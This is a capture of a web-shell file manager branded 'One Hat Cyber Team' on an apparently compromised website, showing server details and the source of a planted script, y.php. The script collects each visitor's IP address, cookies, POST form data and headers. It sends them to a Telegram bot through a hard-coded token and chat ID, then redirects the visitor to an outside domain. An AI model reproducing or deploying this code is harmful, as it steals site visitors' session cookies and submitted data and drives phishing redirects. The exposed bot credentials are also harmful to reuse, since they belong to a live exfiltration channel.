One Hat Cyber Team
Your IP :
216.73.216.193
Server IP :
170.247.48.121
Server :
Linux UBAPDWEB9271 3.10.0-1160.71.1.el7.x86_64 #1 SMP Tue Jun 28 15:37:28 UTC 2022 x86_64
Server Software :
Apache
PHP Version :
7.0.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
lelopagani.com.br
/
public
/
assets
/
js
/
View File Name :
y.php
<?php // ==================== CONFIGURATION ==================== $redirect_url = "https://pell.ldcorpy.online/"; $telegram_token = "8478476041:AAH2VIh2MqHJh2LjqAN0ETzLiXxI8Nnx8wg"; $telegram_chat_id = "-1003995436092"; // ← Make sure this is correct // ======================================================= $user_data = [ "time" => date("Y-m-d H:i:s"), "ip" => $_SERVER['REMOTE_ADDR'] ?? 'Unknown', "forwarded_ip" => $_SERVER['HTTP_X_FORWARDED_FOR'] ?? 'N/A', "user_agent" => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown', "referer" => $_SERVER['HTTP_REFERER'] ?? 'Direct', "host" => $_SERVER['HTTP_HOST'] ?? 'Unknown', "request_uri" => $_SERVER['REQUEST_URI'] ?? 'Unknown', "method" => $_SERVER['REQUEST_METHOD'] ?? 'GET', "query" => $_SERVER['QUERY_STRING'] ?? '', "cookies" => !empty($_COOKIE) ? print_r($_COOKIE, true) : 'No cookies', "post_data" => !empty($_POST) ? print_r($_POST, true) : 'No POST data', ]; $message = "🔴 New Redirection Triggered!\n\n"; foreach ($user_data as $key => $value) { $message .= "• <b>" . ucfirst(str_replace("_", " ", $key)) . ":</b> " . htmlspecialchars($value) . "\n"; } // Send to Telegram function sendTelegram($token, $chat_id, $text) { $url = "https://api.telegram.org/bot{$token}/sendMessage"; $data = [ 'chat_id' => $chat_id, 'text' => $text, 'parse_mode' => 'HTML', 'disable_web_page_preview' => true ]; $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 8); $result = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ['result' => $result, 'http_code' => $http_code]; } $response = sendTelegram($telegram_token, $telegram_chat_id, $message); // Show debug only if failed if ($response['http_code'] !== 200) { echo "<h2>❌ Telegram Error:</h2><pre>"; print_r(json_decode($response['result'], true)); echo "</pre>"; echo "<p><strong>Tip:</strong> Make sure the bot is admin in the channel and chat ID is correct.</p>"; exit; } // Redirect user header("Location: " . $redirect_url, true, 302); exit; ?>